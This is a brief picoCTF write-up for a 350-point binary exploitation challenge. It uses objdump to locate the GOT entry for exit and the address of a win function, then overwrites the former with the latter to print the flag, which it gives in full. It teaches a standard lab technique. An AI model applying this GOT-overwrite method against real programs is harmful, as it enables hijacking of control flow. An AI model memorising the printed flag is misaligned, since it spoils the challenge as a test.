GoT
Binary Exploitation - Points: 350
You can only change one address
The binary lets you overwrite one value at some memory address, get the address of exit from GOT:
$ objdump -R vuln
0804a01c R_386_JUMP_SLOT exit@GLIBC_2.0
Convert the address to decimal: 134520860
Get the address of the win function:
$ objdump -d vuln | grep win
080485c6 <win>
And again convert the address to decimal: 134514118
So when answering these two values, the exit function in GOT will now point to the win function and print the flag.
flag: picoCTF{A_s0ng_0f_1C3_and_f1r3_2a9d1eaf}